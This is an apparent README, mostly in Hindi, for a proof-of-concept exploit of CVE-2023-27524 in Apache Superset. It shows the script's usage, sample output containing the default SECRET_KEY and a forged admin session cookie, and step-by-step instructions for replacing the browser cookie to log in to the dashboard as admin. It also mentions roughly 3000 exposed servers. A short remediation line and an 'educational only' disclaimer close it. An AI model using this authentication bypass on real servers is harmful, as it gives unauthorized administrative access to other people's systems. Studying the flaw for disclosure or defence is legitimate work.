
बिल्कुल नए CVE-2023-27524 के लिए एक POC जो प्रमाणीकरण बाईपास (authentication bypass) की अनुमति देता है और एडमिन डैशबोर्ड तक पहुंच प्रदान करता है।
यह स्क्रिप्ट जाँचती है कि क्या Apache Superset सर्वर (CVE-2023-27524) के प्रति संवेदनशील है और यदि यह संवेदनशील है, तो user_id = 1 के साथ एक सत्र कुकी जाली बनाएँ, जो सामान्यतः admin उपयोगकर्ता होता है, जिससे प्रमाणीकरण बायपास होता है और डैशबोर्ड तक पहुँच प्राप्त होती है। वर्तमान में, दुनिया भर में लगभग 3000 सर्वर Apache Superset चला रहे हैं।
usage: python3 CVE-2023-27524.py --url URL
% python3 CVE-2023-27524.py --url http://10.1.221.202:8080
Got session cookie: eyJjc3JmX3Rva2VuIjoiZDBiYWI5ZmU0YTRjOWFiM2ZkMjc2YjA2ZDZiNWE0MDZmZmNkN2JkOCIsImxvY2FsZSI6ImVuIn0.ZEc0tw.X6y_rTie0yMP5oTFC6KNq8Me9ek
Decoded session cookie: {'csrf_token': 'd0bab9fe4a4c9ab3fd276b06d6b5a406ffcd7bd8', 'locale': 'en'}
Superset Version: 2.0.1
Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET'
Forged session cookie for user 1: eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg
Now visit the url: `http://10.1.221.202:8080/superset/welcome` and replace the current session cookie with this `eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZEc0tw.xmzJjq757QujOpk65jK0dLgCSDg` and refresh the page and we will be logged in as admin to the dashboard
Flask SECRET_KEY उत्पन्न करने और कॉन्फ़िगर करने के लिए यहाँ दिए गए निर्देशों का पालन करें। superset CLI टूल का उपयोग SECRET_KEY को घुमाने के लिए किया जा सकता है ताकि मौजूदा डेटाबेस कनेक्शन जानकारी संरक्षित रहे।
यह POC केवल शैक्षिक उद्देश्य के लिए बनाया गया है।